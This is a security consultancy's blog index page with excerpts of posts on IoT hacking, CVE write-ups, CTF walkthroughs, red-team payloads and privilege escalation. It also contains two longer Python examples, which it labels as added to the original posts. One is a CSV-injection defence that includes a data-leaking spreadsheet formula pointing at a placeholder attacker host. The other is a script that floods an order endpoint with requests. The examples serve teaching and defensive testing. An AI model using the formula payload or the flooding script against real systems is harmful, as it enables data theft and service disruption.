Blog  |  

Stay up to date with Payatu blog


01 September 2020

IoT Security-Part 13 (Introduction to Hardware Recon)

IoT Security Part 13 (Introduction to Hardware Recon) This blog is part of the IoT Security series where we discuss the basic concepts pertaining to the IoT/IIoT eco-system and its security. If yo...

30 August 2020

IoT Security - Part 12 (MQTT Broker Security - 101)

MQTT Broker Security - 101 This blog is part of the IoT Security series where we discuss the basic concepts pertaining to the IoT/IIoT eco-system and its security. If you have not gone through the pre...

27 August 2020

Ten Security Objectives To Consider While Building An IoT Or IIoT Product

Ten Security Objectives to consider while Building an IoT/IIoT product As calculated by former Cisco researcher David Evans, every second,

27 August 2020

10 Most Exploited Software From 2016 To 2020

10 most exploited Software from 2016 to 2020 US-CERT has published a list of the top 10 vulnerabilities that were exploited between 2016 and 2020. Based on that, we have prepared the list of af...

27 August 2020

My hacking adventures with Safari reader mode

My hacking adventures with Safari reader mode Summary In March 2020, I wrote a blogpost on Executing Scripts In Safari Reader Mode To CSP Bypass, in which I had mentioned the Safari reader mode a...

27 July 2020

IoT Security - Part 11 (Introduction To CoAP Protocol And Security)

This blog is part of the IoT Security series where we discuss the basic concepts pertaining to the IoT/IIoT eco-system and its security. If you have not gone through the previous blogs in the series, ...

12 July 2020

SEC4ML Part-2: Adversarial Machine Learning attacks

This is the SEC4ML subsection of the Machine Learning series. Here we will discuss potential vulnerabilities in Machine Learning applications. SEC4ML will cover attacks like Adversarial Learning, Mode...

12 July 2020

Intercepting request which requires VPN + socks proxy

Nowadays we often see that, to pentest an application, we first have to connect to the client's network, for which we have to set up a VPN connection. Only after that can we access the app...

26 June 2020

IoT Security - Part 10 (Introduction To MQTT Protocol and Security)

This blog is part of the IoT Security series where we discuss the basic concepts pertaining to the IoT/IIoT eco-system and its security. If you have not gone through the previous blogs in the series, I wo...

25 June 2020

IoT Security – Part 9 (Introduction to software defined radio)

Introduction This blog is part of the “IoT Security” series. If you haven’t read the previous blogs (parts 1 - 8) in the series, I urge you to go through them first unless you are already fa...

24 June 2020

IoT Security – Part 8 (Introduction to software defined radio)

Introduction This blog is part of the “IoT Security” series. If you haven’t read the previous blogs (parts 1 - 7) in the series, I urge you to go through them first unless you are already fa...

19 June 2020

IoT Security - Part 7 (Reverse Engineering an IoT Firmware)

Introduction This blog is part of the “IoT Security” Series. If you haven’t read the previous blogs (parts 1 - 6) in the series, I urge you to go through them first unless you are already fa...

14 June 2020

Virtualizing ARM-Based Firmware Part - 2

Welcome to Part 2 of the ARM firmware emulation blog series. If you haven't gone through Part 1 of Firmware Emulation, I would recommend going through it first. ARM system built during

11 June 2020

IoT Security – Part 5 (ZigBee Protocol - 101)

ZigBee Protocol 101 This blog is part of the “IoT Security” Series. If you haven’t read the previous blogs (parts 1 - 4) in the series, I urge you to go through them first unless you are alrea...

11 June 2020

IoT Security – Part 6 (ZigBee Security - 101)

ZigBee Security 101 This blog is part of the “IoT Security” Series. If you haven’t read the previous blogs (parts 1 - 5) in the series, I urge you to go through them first unless you are alr...

10 June 2020

Security and privacy of AI/ML applications - A layman's guide

Machine Learning (ML) is growing exponentially these days. Businesses, academia and tech enthusiasts are really hyped about trying out ML to solve their problems. Students are driven to learn this n...

19 May 2020

Analysis of CVE-2020-11930: Reflected XSS in GTranslate WordPress module

Story: A few months back I was reading security news on one of the well-known news sites, and by mistake I typed some characters in the URL; the site responded with an obvious 404 page. At that tim...

11 May 2020

TrendNet Wireless Camera buffer overflow vulnerability

CVE Details ID : Description TrendNet ProVi...

29 April 2020

An analysis of Zoom’s take on Security & Privacy issues: Lockdown Edition

An analysis of Zoom’s take on Security & Privacy issues: Lockdown Edition Because of the lockdown due to COVID-19 in most parts of the world, organizations are moving towards a work-from-home culture....

29 April 2020

The Emerging $5 Trillion Economy to Receive a Cybersecurity Policy Upgrade in 2020

The Emerging $5 Trillion Economy to Receive a Cybersecurity Policy Upgrade in 2020 The National Security Council Secretariat sought suggestions and comments to form the National Cyber Security Str...

16 April 2020

A case of analysing encrypted firmware

Introduction Security analysis of device firmware is a crucial part of IoT security auditing. Obtaining the firmware is among the many challenges of the analysis, and there are tons of techn...

11 April 2020

How We Hacked an Android Game And Ranked First globally

How we hacked an Android game to top the global leaderboard without even playing the game. Recently, we came across an Android game of Minesweeper. The game has been nicely developed and was fun t...

08 April 2020

Navigating the High Cost of a Data Breach

Navigating the High Cost of a Data Breach In the first article in this two-part series, we covered the factors that add to the cost of a data breach, the parameters that play a role in increasing ...

08 April 2020

10 Most common security mistakes in development - My Experience

Nowadays, the security of the applications being used has become a significant concern for organizations, companies, and citizens in general, as they are becoming a more regular part of our daily live...

07 April 2020

Calculating the cost of a data breach

Calculating the cost of a data breach Data breaches eat away at customer trust, brand image, and the overall reputation of a company. By November 2019, 7.9 billion records had been exposed tied to...

28 March 2020

Executing scripts in Safari Reader Mode to CSP Bypass

Reading mode is a feature implemented in most browsers that allows users to read articles in a clutter-free view, i.e. rendering a page in a way that is easy to read without any distraction. Her...

26 February 2020

That Evil Bookmark in your Browser

Some time back, I decided to look at the bookmarks API available to browser extensions. This API sounded interesting to me because it allows you to play with user bookmarks using browser extensions. If...

24 February 2020

Virtualizing ARM-Based Firmware Part - 1

Introduction Hello everyone, this blog demonstrates how to simulate/virtualize ARM-based firmware on your system. This blog is for people who are interested in IoT security and love playin...

18 February 2020

Hardware Attack - Stack Smashing And Protection

Stack exploitation based on buffer overflows is one of the best-known classes of security exploits. Refer for the basic u...

04 February 2020

massCode Code execution (CVE-2020-8548)

A few days back I was looking for a tool to maintain my notes and important code snippets, and I came across a tool called massCode. About massCode massCode is one of the free and open-source c...

29 January 2020

Safari Address Bar Spoof (CVE-2020-3833)

In browsers, the address bar shows the current web address. Address bar spoof vulnerability An address bar spoof is the ability to keep a legitimate URL in the address bar while loading content from other domai...

13 January 2020

SEC4ML part-1: Model Stealing Attack on Locally Deployed ML Models

This is the SEC4ML subsection of the Machine Learning series. Here we will discuss potential vulnerabilities in Machine Learning applications. SEC4ML will cover attacks like Adversarial Learning, Mode...

08 January 2020

Must have Tools for Your Android Pentesting Toolkit

6 Must-have Tools for Your Android Pentesting Toolkit Hello, and welcome everyone! When performing pentesting, whether it is web, network, mobile, or IoT, the most crucial thing the pentester s...

10 December 2019

Get pwned by scanning QR Code

One of the most common ways to navigate to a website or URL is by typing the website address in the browser address bar. But this might be frustrating if you have to type a complex web address that in...

09 December 2019

Kubectl fields plugin

Introduction Kubernetes is an open-source container orchestration system for automating application deployment, scaling, and management.

29 November 2019

CSAW CTF Finals 2018 1nsayne rev-250 writeup

1nsayne (rev-250) We are given a $ file 1nsayne 1nsayne: ELF 64-bit LSB executable, x86-64, version 1 (SYS...

29 November 2019

writing an llvm pass for ctfs

Motive I recently organized a CTF with a couple of my friends. I authored 0bfusc8 much, an RE chall that had 11 solves during the CTF, and I got p...

05 July 2019

Token Stealing with Windows Update KB4054518

Tokens, Accounts, Processes: On a Windows system there are various user accounts; some are default Windows accounts and some are created explicitly. Some of the default user accounts are Local Service, Network Service and so on. Apart from user accounts there are also groups like Users, Everyone etc. Using AccessChk [2] privileges ...

06 June 2019

microsoft edge extensions host-permission bypass (cve-2019-0678)

A browser extension is a plug-in that extends the functionality of a web browser....

13 March 2019

Introduction of Tcache bins in Heap management

Understanding glibc malloc Painless intro to the Linux userland heap understanding the glibc heap implementation Heap Exploitation ...

22 February 2019

6 Must have tools for your iOS pentesting toolkit

When performing pentesting, whether it is web, network, mobile or IoT, the essential thing the pentester should have is their tools. So in this blog, I am going to share the tools which I use to perform pentesting of iOS applications. 1. Cydia Impactor: Cydia Impactor is a GUI tool which is used to install an iOS application onto the iPhone when you have its IPA file. So if you have a jailbreak IPA, this tool is a must, as it will let you install that jailbreak exploit IPA onto your device. You can download Cydia Impactor from here. ...

01 January 2019


DIVA (Damn insecure and vulnerable App) is an App intentionally designed to be insecure....

14 December 2018

Raspberrypi as poor man’s hardware hacking tool

I have been wanting to write this blog for quite some time, but I was either busy or lazy. I have been asked by so many people for a list of hardware to buy to get started with hardware hacking. To be honest, there are a lot of products available, but not many target beginners. In this blog I will cover using SPI, I2C, JTAG/SWD and JTAGenum with a Raspberry Pi. I will be using the Raspberry Pi Zero W, as it is dead cheap and small. Setting up your Raspberry Pi Before you go into each section, I would suggest you boot into your Raspberry Pi and enable SPI, I2C and GPIO from the interfacing options in the raspi-config menu. You can follow this link for setting up your Pi. In all the connection pinouts, the number given is the physical header pin location and not the GPIO number. ...

30 November 2018

“MyMiko” – Responsible Vulnerability Disclosure

This is another case of a vulnerable IoT device. In my previous blogs, we talked about vulnerabilities found in a smart lock and in beacons. This one is a fun device, made for kids to learn to code and play with. I don’t have access to the device, so I just checked the mobile app and found a series of vulnerabilities. These are my findings on a connected smart toy, MyMiko by Emotix, from their Android app. Finding 1: Hard-coded information in the Android app On extracting the Android app, it was identified that several pieces of hard-coded information are present. This hard-coded information includes API calls, web endpoints and other information which could pose a threat. Steps:...

27 November 2018

“Find – Bluetooth Tracker” Responsible Vulnerability Disclosure – Blog

With the advent of IoT, everything is getting connected to the internet. Bluetooth is one such protocol used to connect devices to the internet, as most mobile devices have Bluetooth capability; you can check this blog on how to reverse a Bluetooth communication. There are devices called Bluetooth beacons which are used to track devices in close proximity; companies have started connecting these beacons to the internet with geolocation, and this is one such example. This is a case of my findings on a smart Bluetooth beacon from Sensegiz. The testing was done on their Android mobile application. For users' privacy, the IP/endpoint is not disclosed; it is replaced by xxx. Finding 1: Directory indexing...

22 October 2018

IoT Security – Part 4 (Bluetooth Low Energy – 101)

If you haven’t read through Part 1 to Part 3 of our IoT Security blog series, I would urge you to go through them first unless you are already familiar with the basics of IoT. Link to the previous blog – IoT Security – Part 3. Bluetooth has been a buzzword as people wanted all their devices to be smart, which basically implies that you get to control things across devices without needing to carry wires around. Bluetooth has been on the market for more than a decade. If you’re a millennial, you would have used those classic fancy Nokia phones which had Bluetooth in them. Bluetooth was invented by Ericsson, and other vendors then started using it. Soon after, all the major vendors created a consortium called the Bluetooth Special Interest Group (SIG), which governs what the standard should be and the interoperability between different versions. We are not going to talk about classic Bluetooth here: Bluetooth by itself is a massive stack and its specification runs to around 2000+ pages. In this blog, I will be covering only Bluetooth Low Energy, more famously known as BLE. With the advent of connecting all the things to the internet comes the problem of power and resources. As I mentioned earlier, Bluetooth is a huge stack; implementing it in an end device like a fitness band would take more power and resources. So in the Bluetooth 4.0 standard, they introduced something called Low Energy, which is specially targeted at IoT and smart devices that run on memory- and power-constrained hardware. Bluetooth SIG started selling the standard as Bluetooth Smart, which has two components: Bluetooth Smart devices are end devices which have only the Bluetooth Low Energy component, and Bluetooth Smart Ready devices are capable of doing both Bluetooth LE and classic Bluetooth BR/EDR, which could be your central device, i.e. a mobile phone or laptop. ...

22 October 2018

Another case of a Vulnerable Smart Lock

Disclaimer: The smart lock which I got is pretty common and is even available on Amazon. Several thousand devices are already on the market; I have changed the name of the brand to something imaginary – “*unhackable*” Smart Lock. Smart Lock: The lock which I got is from a company called *unhackable*, which is a Chinese company. You can also get the same lock locally from Amazon, so people do use these devices. The specifications are good too. ...

29 August 2018

RedTeaming from Zero to One – Part 1

Prologue This post is particularly aimed at beginners who want to dive deep into red teaming and move a step ahead from traditional penetration testing. It would also be helpful for Blue Teams/Breach Response Team/SOC analysts to understand the motive/methodology and match the preparedness of a Redteam or real-life adversary. It’s a summary of my experience when I decided to move into Redteaming. It’s a long post, so better grab a coffee and then continue reading this....

29 August 2018

RedTeaming from Zero to One – Part 2

In this part, we will cover payload creation, payload delivery and AV/NIDS evasion. 3. Payload Creation Empire gives us a variety of options to generate a PowerShell agent, including exe, dll, Macro, HTA, bat, lnk, SCT, shellcode, bunny, ducky, etc. Empire windows payload options Some payload creation techniques: 3.1 One-liner PowerShell payload...

15 May 2018


My previous post discussed an attempt we made to gain higher code coverage by leveraging some machine learning methodologies. I recommend you read that post first; you can also take a look at this post to get a beginner-level idea about machine learning. In the previous experiment we targeted JPEG and PDF parsers. The proposed system proved to work better for JPEG file generation than for PDF input generation. This is reasonable, since PDF parsers are syntactically more sensitive: a slight change in syntax will stop the parser from parsing the input. Hence the previously proposed mutation technique resulted in decreased code coverage for generated PDFs. Long story short, we needed a system that learns the grammar/syntax from a corpus of sample inputs. In this post we will discuss an approach to overcome the limitations seen previously. We will be targeting Adobe Acrobat Reader for experimentation. First we will take a look at the PDF file specification, then at the deep learning algorithms that can be used to infer a grammar from a dataset. Finally we will inspect the quality of the generated data based on code coverage. The system described below is integrated with CloudFuzz. Why machine learning? Fuzzing any software that accepts highly syntactic input requires a grammar which can generate syntactically correct inputs. But designing a grammar is a tedious and time-consuming process. Also, the created grammar is highly specific to that particular target software, or might cover only a very narrow spectrum of software. So, our target is to create a very generic system using deep learning which can learn a grammar from a set of samples and generate new inputs for fuzzing accordingly. Anatomy of a PDF file:...

12 April 2018

Expedition ML4SEC Part – 1

There is no doubt that state-of-the-art systems can be built using machine learning algorithms, but at the same time these algorithms pose serious security flaws. An attacker can take advantage of these flaws by creating adversarial inputs that cause machine learning systems to misbehave. In this series we will explore these flaws. But to understand the vulnerabilities we first need to understand how machine learning models work. Hence, I will dedicate this post to the basics of machine learning and finish by building a basic machine learning model. Introduction: Training a machine learning model means increasing the performance of that model on a particular task. The model “learns” from a dataset. Based on this learning process, machine learning algorithms are classified into the following major types. Supervised learning: In supervised learning, we feed the algorithm with features and labels. Consider the problem of classifying network packets as malicious or non-malicious. Here the features could be the attributes of the packet such as source IP, destination IP, port, protocol, payload length, flags, etc., and the label could be 0 or 1 based on whether the packet is malicious or not. Classification algorithms such as neural nets and SVMs fall into this category. Unsupervised learning: This type of learning is used when we do not have labeled samples. The algorithm learns to differentiate the samples based on their features. Suppose we have a huge set of images of two persons and want to classify them. We feed these images to an unsupervised algorithm, which will then create two or more clusters of these images (based on features), which can be labelled as person A and person B. Hence these algorithms are sometimes called “clustering” algorithms. Semi-supervised learning: Semi-supervised learning is used when we have a mixture of labeled and unlabeled data in the dataset....

20 February 2018

A guide to Linux Privilege Escalation

What is Privilege escalation? Most computer systems are designed for use by multiple users. Privileges define what a user is permitted to do. Common privileges include viewing and editing files, or modifying system files. Privilege escalation means a user obtains privileges they are not entitled to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. It usually occurs when a system has a bug that allows security to be bypassed or, alternatively, has flawed design assumptions about how it will be used. Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions. While organizations are statistically likely to have more Windows clients, Linux privilege escalation attacks are significant threats to account for when considering an organization’s information security posture. Consider that an organization’s most critical infrastructure, such as web servers, databases, firewalls, etc., is very likely running a Linux operating system. Compromises of these critical devices have the potential to severely disrupt an organization’s operations, if not destroy them entirely. Furthermore, Internet of Things (IoT) and embedded systems are becoming ubiquitous in the workplace, thereby increasing the number of potential targets for malicious hackers. Given the prevalence of Linux devices in the workplace, it is of paramount importance that organizations harden and secure these devices. Objective In this blog, we will talk in detail about what security issues could lead to a successful privilege escalation attack on any Linux-based system.
We will also discuss how an attacker can use known techniques to elevate his privileges on a remote host, and how we can protect our systems from any such attack. At the end, examples will demonstrate how we achieved privilege escalation on different Linux systems under different conditions....

05 February 2018

Machine learning for effective fuzzing – CloudFuzz

Problem: Fuzzing software with random data may or may not discover new bugs. Also, such random attempts do not guarantee coverage of the complete code. Hence there should be a system which learns the type and format of input files and generates similar files to attain higher code coverage. Since there could be countless file formats, our system should be highly generic and should work for every type of file format. It should not be bound to a certain type of input. E.g.: if the system works for .doc files then it should also work for JPEGs or PDFs, etc. ...

19 January 2018

IoT Security – Part 3 (101 – IoT Top Ten Vulnerabilities)

When talking about Top Ten vulnerabilities, the first thing that comes to mind is OWASP. Why not? After all, they are the pioneers in defining the top 10 vulnerabilities for web and mobile. I’m an OWASP fan, simply because of the work the OWASP community has done over the years to define application security issues and provide free tutorials and open source tools for the industry to mitigate the risks and vulnerabilities. It is highly unlikely that you haven’t heard of OWASP or read content from their website; however, if you have not, I strongly suggest that you go through it. OWASP has also started an IoT security initiative where the community has defined the IoT attack surface and the IoT Top 10 vulnerabilities, in addition to web and mobile. They are headed in the right direction, and soon enough it will be an excellent place for IoT security content. The content relevant to the reader for IoT security on the OWASP website is as follows: 1. OWASP Web Top 10 project: – 2. OWASP Mobile Top 10 Project: 3. OWASP Internet of things project:

15 January 2018

Understanding Stack based buffer overflow

What is a stack? A stack is a limited-access data structure: elements can be added to and removed from the stack only at the top. It works on the LIFO (last-in, first-out) principle. A stack supports two operations, push and pop. Push: adds an item to the top of the stack. Pop: removes an item from the top of the stack. Now let’s examine the memory layout of a C program, especially the stack: its contents and how it works during a function call and return....

01 December 2017

Tiredful API Solution

The idea behind the app is to consume the API endpoints using a REST client such as Postman, curl, ARC or the RESTClient Firefox add-on. For demonstration I am using the RESTClient Firefox add-on. Now, let’s get started with the main aim of this post – solutions to the Tiredful API challenges. Solutions Information Disclosure The first challenge in the list is “Information Disclosure”. From the following image you can see that the API endpoint is <host>/api/v1/books/<ISBN>/; use the valid IDs mentioned. ...

30 November 2017

CSV injection

In this write-up we will be focusing on CSV injection. CSV, also known as Comma-Separated Values, stores tabular data (numbers and text) in plain text. Each record consists of one or more fields, separated by commas. Nowadays, many web applications and frameworks allow users to export data saved in a database into a CSV file. The CSV file created might be vulnerable to CSV injection, so it becomes very important to be sure that the file exported through the web application is safe and will not leave the user’s system prone to attack. CSV injection, a.k.a. formula injection, occurs when a website embeds untrusted user input inside a CSV file without validating it. When the user opens the CSV file in a spreadsheet program such as Microsoft Excel or LibreOffice Calc, any cell starting with ‘=’ will be interpreted by the software as a formula (cells starting with ‘+’, ‘-’ or ‘@’ are treated the same way by these programs). Spreadsheet programs like Microsoft Excel, OpenOffice and LibreOffice Calc are not new programs; we have been using them to perform different tasks like calculation, analysis, and visualization of data. These programs provide many formulas and functions which we use in our day-to-day life. For example: the image below shows Microsoft Excel adding the values of two fields and displaying the result in a third field....
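As an added worked example (not code from the original post), the Python below puts a vulnerable CSV exporter beside a hardened one and adds a scanner a tester can run over an exported file to spot cells a spreadsheet would evaluate. The sample rows and the attacker.example host are constructed for illustration; the apostrophe-prefix neutralization is the standard text-forcing trick in Excel and Calc, and plain numbers such as -15 are deliberately left alone.

```python
import csv
import io

# Leading characters that make Excel / LibreOffice Calc evaluate a cell as a
# formula. '=' is the classic trigger; '+', '-' and '@' are treated the same
# way, and a leading tab or carriage return is sometimes used to slip a
# trigger past a filter that only looks at the first character.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample export: a user table in which "mallory" has put a formula
# into the display-name field. attacker.example is a placeholder host.
SAMPLE_ROWS = [
    ["user", "display_name", "balance"],
    ["alice", "Alice Example", 120],
    ["mallory", '=HYPERLINK("https://attacker.example/?x="&C2,"Invoice")', 0],
    ["bob", "+44 20 7946 0000", -15],
]


def looks_numeric(cell: str) -> bool:
    """A plain number such as -15 or +3.5 is harmless even though it starts
    with a trigger character, so it is neither flagged nor mangled."""
    try:
        float(cell)
        return True
    except ValueError:
        return False


def is_formula(cell: str) -> bool:
    """True if a spreadsheet would evaluate this text cell as a formula."""
    return cell.startswith(FORMULA_TRIGGERS) and not looks_numeric(cell)


def neutralize_cell(cell):
    """Return a form of the cell that spreadsheets read as literal text.

    A leading apostrophe forces Excel and Calc to treat the cell as text, so
    the formula is displayed to the user instead of being evaluated.
    Non-string values (numbers) are passed through untouched.
    """
    if isinstance(cell, str) and is_formula(cell):
        return "'" + cell
    return cell


def export_unsafe(rows) -> str:
    """Vulnerable exporter: writes database rows to CSV verbatim."""
    buf = io.StringIO()
    csv.writer(buf).writerows(rows)
    return buf.getvalue()


def export_safe(rows) -> str:
    """Hardened exporter: neutralizes every formula-looking cell before
    writing, and quotes every field so delimiters in data cannot break rows."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


def find_formula_cells(csv_text: str):
    """Scan a CSV export (for example one downloaded from an application under
    test) and return (row, column, value) for each cell a spreadsheet would
    evaluate. An empty list means the export is clean."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula(cell):
                hits.append((r, c, cell))
    return hits


if __name__ == "__main__":
    print("unsafe export flags:", find_formula_cells(export_unsafe(SAMPLE_ROWS)))
    print("safe export flags:  ", find_formula_cells(export_safe(SAMPLE_ROWS)))
    print(export_safe(SAMPLE_ROWS))
```

Run against the unsafe export, the scanner reports mallory's HYPERLINK cell and, as a false positive worth knowing about, bob's phone number: any text beginning with "+" is a formula to a spreadsheet, so the hardened exporter also prefixes it with an apostrophe. That is the trade-off of output-side neutralization; if a column is known to be numeric-only, validate it on input instead and keep it as a number.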

22 November 2017

Getting Started with Radio Hacking – Part 2 – Listening to FM using RTL-SDR and GQRX

Welcome to the 2nd post in the Radio Hacking series. I hope you have gone through the 1st part; if not, please check Part 1. Also, I hope you have installed GQRX on your PC/laptop. Let’s start. What we will learn – In this post, we will learn how to use GQRX along with an RTL-SDR. We will be using the RTL-SDR to receive an FM signal and listen to a song. Tools – We will use an RTL-SDR and GQRX. Please install GQRX on your PC/laptop. What is RTL-SDR – RTL-SDR is a cheap USB dongle which can be used for “RECEIVING” radio signals; in our case, it will capture the FM signal. Its price is around $20. RTL-SDR is also referred to as RTL2832U, DVB-T SDR, RTL dongle or the “$20 Software Defined Radio”. There are many other software defined radios better than the RTL-SDR, but they all come at a higher price. RTL-SDR looks like this –...

22 November 2017

6 tools you need to be aware of if you are into device pentesting

IoT and smart devices are dominating the market at a tremendous rate. But with growing competition in the market, these devices often forgo proper standards and security procedures, leading to attacks including the Mirai botnet, the Reaper attack, and others that are yet to be discovered. The good news is that these incidents have cautioned companies to take security testing more seriously. This has resulted in a host of security testers, developers and software security professionals getting into IoT penetration testing. ...

21 November 2017

CSAW CTF Finals 2017 WriteUps

Rabbithole Reversing rabbithole How far down the rabbit hole can you go?...

21 November 2017

How I Reverse Engineered and Exploited a Smart Massager

I have been working with Bluetooth for quite some time. I chose to reverse engineer a smart device to prove how crazy the security standards implemented in these smart devices are. In this post, I will be showing you how I reverse engineered a Bluetooth-based (smart) massager and how I could exploit it to make it lethal. Now how is a massager lethal? The massager works on a principle called TENS (transcutaneous electrical nerve stimulation). Our entire nervous system works on neural impulses, which are electrical signals. Everything from the sense of a pinch to the sense of orgasm is an electrical impulse that causes different hormones to be secreted in your brain, and you feel pain or pleasure....

09 October 2017

Authentication schemes in REST API

In simple terms, authentication means the process of verifying the identity of a user. The process consists of simple steps: 1) The user tries to connect to the web service. 2) The web service asks the user for credentials (identity information). 3) The user provides the credentials. 4) The web service verifies the identity of the user by checking the provided credentials and responds accordingly....

08 September 2017

IoT Security – Part 2 (101 – IoT Attack surface)

Welcome! I hope you have gone through the previous blog post “IoT Security – Part 1”. If not, I would urge you to go through it to understand the meaning of IoT and IoT architecture. Now we will start getting into security and try to define a way to understand and create a structured process for performing security research or penetration testing of IoT. If we look at the architecture defined in the previous post, it now becomes clear and easy for us to segregate the components of IoT, define the attack surface for each of them individually, and then combine them to create a holistic overview of the IoT ecosystem attack surface. I call it the IoT ecosystem instead of the IoT product because it is indeed an ecosystem of different components talking to each other and solving a particular real-world problem. Let’s go ahead and define the attack surface of the IoT ecosystem and discuss each component’s attack surface in detail. The attack surface by component can be divided into three or four (if we include communication as an attack surface) major areas as follows: Mobile Cloud Communication...

06 September 2017

Automating IVR pentesting

The call might get disconnected if you enter an invalid DTMF value, and you would have to make the call again and enter all those DTMF values manually to reach the stage where you can enter a different payload. So I thought of automating it, because I couldn’t find any tool on the internet which can do this. Objective To develop a generic tool which can automate the IVR call flow and also automate the process of sending attack vectors through an interactive program, so that it can save a pentester’s time. What is IVR? Interactive voice response (IVR) is a technology that allows a computer to interact with humans through the use of voice and DTMF tones input via a keypad. In telecommunications, IVR allows customers to interact with a company’s host system via a telephone keypad or by speech recognition, after which services can be inquired about through the IVR dialogue. IVR systems can respond with prerecorded or dynamically generated audio to further direct users on how to proceed. Where is it used?...

04 September 2017

Vulnhub SickOs 1.2 – Walkthrough

The objective was to break into the machine and read the flag kept under /root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt. Attacker’s IP is So let’s start!!! 1. Started with netdiscover to locate the victim’s IP address. Victim was at 2. Scanned for open ports using nmap and found ports 22 and 80 open. A lighttpd web server is running on port 80....

03 September 2017

Vulnhub Stapler – Walkthrough

on here. 1. First I tried checking the IP address using netdiscover. The victim appears to be sitting at The attacker machine is at 2. Next, nmap helped us check the open ports and the respective services running. ...

01 September 2017

Kioptrix Level -1 Walkthrough

Unlike other walkthroughs, this will be a crisp manual. Without wasting much time I’ll show the final steps and not go into the details of reconnaissance and failed attempts. The VMs were set up back in 2010, and while solving challenge 1 I ran into a couple of issues which I was eventually able to resolve. I downloaded the VM from here and used VirtualBox 4.3.36 on an Ubuntu host. Both the victim machine (Kioptrix 1 VM) and the attacker machine (Kali 2.0) are kept on a “Host Only” network configuration. Attacker’s IP : In order to find the victim within the local network, we’ll be using the netdiscover utility. Victim appears to be sitting at ...

31 August 2017

Dissecting GSM encryption and Location update process

Have you ever wondered what happens when you turn on your mobile phone? How does it communicate with the network in a secure manner? Almost all of us have read about TCP/IP and many of us are experts in it, but when it comes to telecom, very few know how it actually works from the inside. What is the message structure in GSM? What kind of encryption does it use? So today we will be talking in detail about the encryption standards of GSM and how the mobile phone updates its location with the mobile network. What happens when you turn on your cell phone? When you turn on your cell phone, it first initiates its radio resource and mobility management processes. The phone receives a list of frequencies supported on the neighbouring cells either from the SIM or from the network. It camps on a cell depending on the power level and the mobile provider. After that, it performs a location update with the network, during which authentication happens (in GSM this authentication is one-way: the network authenticates the phone, but the phone has no way to authenticate the network). After a successful location update, the mobile phone gets its TMSI and is ready to perform other operations. Now, let’s verify the above statements by having a look at the mobile application debug logs. The screenshots below are from the osmocom mobile application, which simulates a mobile phone on a PC....

29 August 2017

Active analysis of a GSM call through osmocom-bb

In the last blog, we learnt how to do passive sniffing of GSM data using an RTL-SDR. I don’t want to go much further into what can be done with passive analysis of GSM, as it didn’t interest me much. Almost all operators have now upgraded their encryption standards, so sniffing GSM data using a USRP and cracking it using Kraken is difficult now. There are other cost-effective approaches that researchers have used to recover the session key (Kc) from sniffed GSM data, such as running osmocom-bb on multiple phones and hopping channels to capture data, or just using an RTL-SDR. But today we will focus on active analysis of GSM, as that is more interesting and useful for research purposes. If you still want to know what can be done with just passive analysis of GSM data, you can read the tutorials released by SRLabs on how to decrypt GSM data. They have done an awesome job on this. Objective: We will intercept a GSM call in Wireshark using Osmocom-BB and a Motorola C118 phone, and then analyze the GSM packets and learn what we can make out of them. What is Osmocom-BB?...

18 August 2017

Automating Stuff with Python

What is Automation? The use of a machine or computer to perform your task efficiently and in much less time can be termed automation. Why do we need automated scripts? Humans can do great things, but sometimes we are too lazy to do some of them. For example, if I ask you to multiply 345*246, most of you will open the calculator on your device to get the result rather than use pen and paper. Using automated scripts makes our task easy and less time-consuming. Ever wondered why we need automated scripts in security testing? If so, the answer to your question is here. While performing security testing you can come across a task that needs to be done many times, like placing 1 lakh (100,000) orders to check whether the application can be flooded with requests. Sitting and creating each and every request manually would be a very tough job. So here we can use automated scripts to do the job....
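The "place many orders" task above is the kind of thing a short script handles in seconds. The example below is added here and is not the post's code: it starts a throwaway in-process HTTP server with a hypothetical, constructed `/order` endpoint, fires a configurable number of concurrent POSTs at it from a thread pool, and tallies the status codes and the number of orders the server actually recorded. Against a real target the tally is the finding: if every request lands as 201 with no throttling, the application accepts the flood.

```python
"""Automate a repetitive test: submit many orders concurrently and tally the outcome.

Added example, not the original post's code. The target is a constructed
in-process HTTP server (hypothetical POST /order) so the script runs offline.
"""
import json
import threading
from collections import Counter
from concurrent.futures import ThreadPoolExecutor
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.request import Request, urlopen


class OrderHandler(BaseHTTPRequestHandler):
    """Constructed target: accepts every POST /order and counts orders per session."""
    orders_seen = Counter()          # shared across handler instances
    lock = threading.Lock()

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = json.loads(self.rfile.read(length) or b"{}")
        with self.lock:
            OrderHandler.orders_seen[body.get("session", "anon")] += 1
        self.send_response(201)     # no rate limit, no per-session cap: floodable
        self.end_headers()

    def log_message(self, *args):   # keep the demo quiet
        pass


def start_server():
    """Bind to a free loopback port and serve in a background thread."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), OrderHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def place_order(url, session, item):
    """One order request; returns the HTTP status code."""
    payload = json.dumps({"session": session, "item": item}).encode()
    req = Request(url, data=payload, method="POST",
                  headers={"Content-Type": "application/json"})
    with urlopen(req, timeout=5) as resp:
        return resp.status


def flood(url, n, workers=4, session="tester"):
    """Send n orders from a thread pool; return a Counter of status codes."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        statuses = pool.map(lambda i: place_order(url, session, f"item-{i}"), range(n))
        return Counter(statuses)


def run_demo(n=200):
    """Start the constructed server, flood it, and report (statuses, orders recorded)."""
    srv = start_server()
    try:
        url = f"http://127.0.0.1:{srv.server_address[1]}/order"
        return flood(url, n), OrderHandler.orders_seen["tester"]
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    statuses, recorded = run_demo()
    print("status codes:", dict(statuses), "orders recorded:", recorded)
```

To point it at a real application, replace `url` with the target endpoint and `place_order` with the exact request captured from the proxy (cookies, CSRF token and all); keep `n` small until you have confirmed the test is in scope.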

10 August 2017

